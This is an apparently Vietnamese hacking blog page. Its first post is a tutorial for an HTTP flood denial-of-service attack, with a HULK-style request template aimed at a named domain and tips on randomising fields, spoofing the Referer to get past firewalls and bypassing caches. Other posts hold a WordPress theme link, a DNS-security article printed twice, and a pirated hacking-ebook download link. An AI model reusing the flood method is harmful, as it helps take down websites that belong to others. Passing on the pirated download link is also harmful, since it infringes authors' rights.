Friday, October 26, 2012

[TUT] HTTP Flood site HTML và 1 số site không cho connection = keep-alive

Cách dùng > thay user agent , thay host name thay Referer, thay random char > ném vào webhunter.

1.Thực tế nó là request của HULK dos tool @@ tut by hisoka @@ lech ghi với nhé

Trích:
GET /?ASH=REHRKP HTTP/1.1
Accept-Encoding: identity
Host: huydiet.vn
Keep-Alive: 110
User-Agent: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.google.com/?q=VUCWJE
Cache-Control: no-cache
> random char
>>Keep-Alive: 110 nên set thấp xuống tùy server conf
>>acces từ công cụ tìm kiếm.1 cách qua FW hiệu quả
>> Connection: close > close còn lâu mới nói
>>bypass cache
vào lúc No comments:

Skin Metro Windows 8 cực đẹp cho WordPress

Skin Metro Windows 8 cực đẹp cho WP



Download: http://smthemes.com/download/metropress/
vào lúc No comments:

Tăng bảo mật máy tính thông qua DNS server

DNS là thành phần cốt lõi trong mạng Internet. Giao thức giúp chuyển đổi một địa chỉ web, thường được gọi là URL thành một địa chỉ thực, hay địa chỉ IP.

Máy tính biết cách truyền tin đến địa chỉ IP nào đó, nhưng lại không trực tiếp biết được địa chỉ IP từ URL, một dạng địa chỉ danh định giúp người dùng dễ nhớ.

Do vậy, DNS server có mặt để giúp phân giải tên miền giúp máy tính có thể lấy được địa chỉ IP dựa trên URL để truyền thông qua Internet. Không phải chỉ có một DNS server trung tâm làm nhiệm vụ phân giải URL cho tất cả mọi người.

Có rất nhiều DNS server khác nhau trên thế giới được đặt ở phía các nhà cung cấp Internet ISP hay những dịch vụ bên thứ ba như OpenDNS. Trên thực tế, người dùng sẽ sử dụng dịch vụ DNS từ phía ISP nếu không thực hiện bất kỳ thay đổi thiết lập nào đối với máy tính hay bộ định tuyến (router).

Mặc dù vậy, DNS server từ ISP thường là đơn giản, nghĩa là chỉ có chức năng phân giải URL. Chúng thường không trú trọng vào tính bảo mật do vậy những server này khá nhạy cảm với các cuộc tấn công mạng.


Khi một DNS server bị tấn công, sẽ có một số thay đổi có thể xảy đến. Đầu tiên là, server đơn giản chỉ bị gián đoạn hay ngoại tuyến và không thể phân giải URL cho người dùng như bình thường cho đến khi được ISP khắc phục vấn đề.

Thứ hai là, kẻ tấn công có thể thay đổi các bản ghi DNS trên server và trỏ những URL nhất định tới những trang giả mạo khác. Đây là một kiểu tấn công đặc biệt nguy hiểm do những cuộc tấn công lừa đảo (phishing) thường được phát hiện do có URL lạ, nhưng với một DNS server lỗi, URL vẫn hiển thị chính xác như trước nhưng người dùng vẫn bị dẫn đến trang web khác.

Giải pháp

Do vậy, biện pháp an toàn nhất là chuyển sang sử dụng một DNS server được hỗ trợ bảo mật tốt hơn. Có một số dịch vụ DNS cho người dùng chọn lựa như các server DNS công cộng của Google được xây dựng bởi chính gã khổng lồ tìm kiếm và được bảo trì thường xuyên, vì vậy ta sẽ không phải lo lắng về bất kỳ phát sinh hay tấn công mạng nào.

Hoặc, người dùng cũng có thể sử dụng OpenDNS để trải nghiệm DNS đầy đủ hơn. Dịch vụ có những tùy chọn đặc biệt giúp ngăn chặn các loại tấn công mạng nhất định và thậm chí có cả một bộ lọc web khả biến.


Sau khi đã xác định được DNS server muốn chuyển sang sử dụng, bạn sẽ cần thay đổi các thiết lập hệ thống. Cách thay đổi thiết lập này thì khác nhau tùy vào loại hệ điều hành.

Người dùng Windows sẽ cần vào phần thuộc tính mạng sau đó truy cập thuộc tính IPv4 và thay đổi DNS servers ở cuối cửa sổ hiện ra. Người dùng Mac OS X cần vào System Preferences, kích vào Network, chọn thiết bị mạng, kích vào Advanced và sau đó nhập DNS servers sau khi kích vào thẻ DNS.

Người dùng Linux sẽ cần kích vào applet mạng, chọn Edit Connections, nhấn Edit. Dưới thẻ IPv4 Settings, chọn Automatic (DHCP) addresses only, và sau đó thêm DNS servers vào hộp văn bản DNS servers, với mỗi địa chỉ server được ngăn cách bởi một dấu phẩy.

Ngay cả người dùng Android cũng có thể thay đổi DNS server nhưng nó chỉ có tác dụng khi bạn sử dụng Wi-Fi. Do vậy, bạn có thể tìm những thiết lập phù hợp khi nhấn vào phím Menu và chọn Advanced trong khi ở màn hình cài đặt Wi-Fi.

Lưu ý: Các DNS server của Google có địa chỉ 8.8.8.8 và 8.8.4.4 trong khi các server của OpenDNS là 208.67.222.222 và 208.67.220.220.

Kết luận

Những lỗi phát sinh trên DNS server thực sự nghiêm trọng hơn mọi người thường nghĩ rất nhiều do hiếm có ai nói về chúng hay đề cập đến việc chuyển sang server khác. Đổi DNS server nên là ưu tiên trước hết để giữ an toàn cho máy tính của mình.

QTM_(Theo MakeUseOf)
vào lúc No comments:

Tăng bảo mật máy tính thông qua DNS server

DNS là thành phần cốt lõi trong mạng Internet. Giao thức giúp chuyển đổi một địa chỉ web, thường được gọi là URL thành một địa chỉ thực, hay địa chỉ IP.

Máy tính biết cách truyền tin đến địa chỉ IP nào đó, nhưng lại không trực tiếp biết được địa chỉ IP từ URL, một dạng địa chỉ danh định giúp người dùng dễ nhớ.

Do vậy, DNS server có mặt để giúp phân giải tên miền giúp máy tính có thể lấy được địa chỉ IP dựa trên URL để truyền thông qua Internet. Không phải chỉ có một DNS server trung tâm làm nhiệm vụ phân giải URL cho tất cả mọi người.

Có rất nhiều DNS server khác nhau trên thế giới được đặt ở phía các nhà cung cấp Internet ISP hay những dịch vụ bên thứ ba như OpenDNS. Trên thực tế, người dùng sẽ sử dụng dịch vụ DNS từ phía ISP nếu không thực hiện bất kỳ thay đổi thiết lập nào đối với máy tính hay bộ định tuyến (router).

Mặc dù vậy, DNS server từ ISP thường là đơn giản, nghĩa là chỉ có chức năng phân giải URL. Chúng thường không trú trọng vào tính bảo mật do vậy những server này khá nhạy cảm với các cuộc tấn công mạng.


Khi một DNS server bị tấn công, sẽ có một số thay đổi có thể xảy đến. Đầu tiên là, server đơn giản chỉ bị gián đoạn hay ngoại tuyến và không thể phân giải URL cho người dùng như bình thường cho đến khi được ISP khắc phục vấn đề.

Thứ hai là, kẻ tấn công có thể thay đổi các bản ghi DNS trên server và trỏ những URL nhất định tới những trang giả mạo khác. Đây là một kiểu tấn công đặc biệt nguy hiểm do những cuộc tấn công lừa đảo (phishing) thường được phát hiện do có URL lạ, nhưng với một DNS server lỗi, URL vẫn hiển thị chính xác như trước nhưng người dùng vẫn bị dẫn đến trang web khác.

Giải pháp

Do vậy, biện pháp an toàn nhất là chuyển sang sử dụng một DNS server được hỗ trợ bảo mật tốt hơn. Có một số dịch vụ DNS cho người dùng chọn lựa như các server DNS công cộng của Google được xây dựng bởi chính gã khổng lồ tìm kiếm và được bảo trì thường xuyên, vì vậy ta sẽ không phải lo lắng về bất kỳ phát sinh hay tấn công mạng nào.

Hoặc, người dùng cũng có thể sử dụng OpenDNS để trải nghiệm DNS đầy đủ hơn. Dịch vụ có những tùy chọn đặc biệt giúp ngăn chặn các loại tấn công mạng nhất định và thậm chí có cả một bộ lọc web khả biến.


Sau khi đã xác định được DNS server muốn chuyển sang sử dụng, bạn sẽ cần thay đổi các thiết lập hệ thống. Cách thay đổi thiết lập này thì khác nhau tùy vào loại hệ điều hành.

Người dùng Windows sẽ cần vào phần thuộc tính mạng sau đó truy cập thuộc tính IPv4 và thay đổi DNS servers ở cuối cửa sổ hiện ra. Người dùng Mac OS X cần vào System Preferences, kích vào Network, chọn thiết bị mạng, kích vào Advanced và sau đó nhập DNS servers sau khi kích vào thẻ DNS.

Người dùng Linux sẽ cần kích vào applet mạng, chọn Edit Connections, nhấn Edit. Dưới thẻ IPv4 Settings, chọn Automatic (DHCP) addresses only, và sau đó thêm DNS servers vào hộp văn bản DNS servers, với mỗi địa chỉ server được ngăn cách bởi một dấu phẩy.

Ngay cả người dùng Android cũng có thể thay đổi DNS server nhưng nó chỉ có tác dụng khi bạn sử dụng Wi-Fi. Do vậy, bạn có thể tìm những thiết lập phù hợp khi nhấn vào phím Menu và chọn Advanced trong khi ở màn hình cài đặt Wi-Fi.

Lưu ý: Các DNS server của Google có địa chỉ 8.8.8.8 và 8.8.4.4 trong khi các server của OpenDNS là 208.67.222.222 và 208.67.220.220.

Kết luận

Những lỗi phát sinh trên DNS server thực sự nghiêm trọng hơn mọi người thường nghĩ rất nhiều do hiếm có ai nói về chúng hay đề cập đến việc chuyển sang server khác. Đổi DNS server nên là ưu tiên trước hết để giữ an toàn cho máy tính của mình.

QTM_(Theo MakeUseOf)
vào lúc No comments:

Ebook Collection [Linux, Exploits, Networking, Programming]

EBOOKS INCLUDED

Exploit Folder

  • Extreme Exploits - Advanced Defenses Against Hardcore Hacks
  • Hacking - The Art Of Exploitation
  • Shellcoder's Programming Uncovered
  • The Shellcoder's Handbook - Discovering And Exploiting Security Holes

Programming Folder


  • Hacker Disassembling Uncovered
  • Learning PHP & MySQL
  • Michael - Mastering UNIX Shell Scripting

C / C++
  • C By Example
  • C In a Nutshell
  • C Primer Plus, 5th Edition
  • C-C++ Programmer's Reference, 3rd Edition
  • Cryptography In C And C++
  • Effective C++, 3rd Edition
  • Optimizing C++
  • Programming Embedded Systems In C And C++
  • Secure Programming Cookbook For C And C++

Linux
  • Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition
  • Beginning Linux Programming
  • Burtch - Linux Shell Scripting with Bash
  • Glass,Ables - Linux for Programmers and Users
  • Guide To Assembly Language Programming In Linux
  • Korn Shell Unix and Linux Programming Manual,
  • Matthew - Beginning Linux Programming
  • Mitchell - Advanced Linux Programming
  • Wall - Linux Programming Unleashed

Perl
  • Advanced Perl Programming, 2nd Edition
  • Beginning Perl Web Development - From Novice To Professional
  • Intermediate Perl
  • Learning Perl Objects, References, & Modules
  • Learning Perl, 4th Edition
  • Minimal Perl For UNIX And Linux People
  • Perl Best Practices
  • Perl Hacks - Tips And Tools For Programming Debugging And Surviving
  • Perl Medic - Transforming Legacy Code

Hacking Folder


  • Hacker Linux Uncovered
  • Hacker's Delight
  • Hacker's Guide
  • Hacker's Handbook
  • Hackers_Secrets
  • Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
  • Hacking For Dummies
  • Honeypots - Tracking Hackers
  • The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers

Web
  • Firefox Hacks - Tips & Tools For Next-Generation Web Browsing
  • Google Hacking For Penetration Testers
  • Google Hacks, 3rd Edition
  • Hacker Web Exploitation Uncovered
  • Web Hacking - Attacks And Defense

Networking Folder


  • Advanced Linux Networking
  • Hack The Stack - Using Snort And Ethereal To Master The 8 Layers Of An Insecure Network
  • OpenVPN - Building And Integrating Virtual Private Networks

Programming
  • Illustrated TCP-IP - A Graphic Guide To The Protocol Suite
  • Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
  • Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version.
  • Tcp Ip For Dummies
  • TCP-IP Foundations (2004)
  • TCP-IP Network Administration,
  • TCPIPTools
  • Understanding TCP-IP
  • Unix Network Programming - Volume I - The Sockets Networking API,

Security
  • Cryptography And Network Security,
  • Designing And Implementing Linux Firewalls And QoS
  • Firewall Policies And VPN Configurations
  • Fundamentals of Network Security
  • LANSecurity
  • Maximum Computer Security-A Hacker's Guide to Protecting Your Internet Site and Network
  • McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed
  • Network Security Assessment - From Vulnerability To Patch
  • Network Security Hacks - 100 Industrial-Strength Tips & Tools,
  • Network Security With OpenSSL
  • Self-Defending Networks - The Next Generation Of Network Security

Unix Folder


BSD
  • Absolute BSD - The Ultimate Guide To FreeBSD
  • Absolute OpenBSD - Unix For The Practical Paranoid
  • Embedded FreeBSD Cookbook (2002)
  • Learning the UNIX Operating System
  • Mastering FreeBSD And OpenBSD Security
  • SysAdmin - Security Tools in FreeBSD
  • Teach Yourself FreeBSD In 24 Hours
  • The Complete FreeBSD, 4th Edition
  • The OpenBSD 4.0 Crash Course
  • Unix Power Tools, 3rd Edition

Kernel
  • linuxKernelSux
  • OReilly.Understanding.The Linux Kernel 1st Edition
  • Understanding The Linux Kernel, 3rd Edition

Linux
  • A Practical Guide To Linux Commands, Editors, And Shell Programming
  • Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
  • Hack Proofing Linux - A Guide To Open Source Security
  • Linux Basic Commands
  • Linux Kernel Development, 2nd Edition
  • Linux Kernel module programming guide 1
  • Linux Shell Scripting With Bash (2004)
  • Linux_Administration_Made_Easy
  • Linux_Administrators_Security_Guide
  • McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
  • OReilly - Linux_Network_Administrator's_Guide_Second_Edition
  • Sam teach you Linux in 24 hours
  • Securing Linux A Survival Guide for Linux Security Version 1.0 2003
  • Securing Linux Servers for Service Providers
  • SELinux (2004)

Shell
  • shell-scripting
  • tcsh
  • Unix Shell Programming, 3rd Edition (2003)

SQL Folder


  • Mastering_MySQL_4.2003.Sybex
  • MySQL - 2nd Edition (Sams)
  • MySQL - Essential Skills (2004)
  • MySQL - Visual QuickStart Guide, 2nd Edition (2006)
  • MySQL Certification Study Guide (2004)
  • MySQL Cookbook (2002)
  • MySQL Cookbook
  • MySQL Pocket Reference (2003)
  • MySQL Tutorial (2003)
  • MySQL.PHP.Database.Applications
  • SQL - A Beginner's Guide, 2nd Edition (2003)
  • SQL - Practical Guide For Developers (2005)
  • SQL Bible (2003)
  • SQL Cookbook (2005)
  • SQL For Dummies, 6th Edition (2006)
  • SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
  • SQL Server 2000

DOWNLOAD


http://www.multiupload.com/0UTEX76FE9

Nguồn: hackforums.net
vào lúc No comments: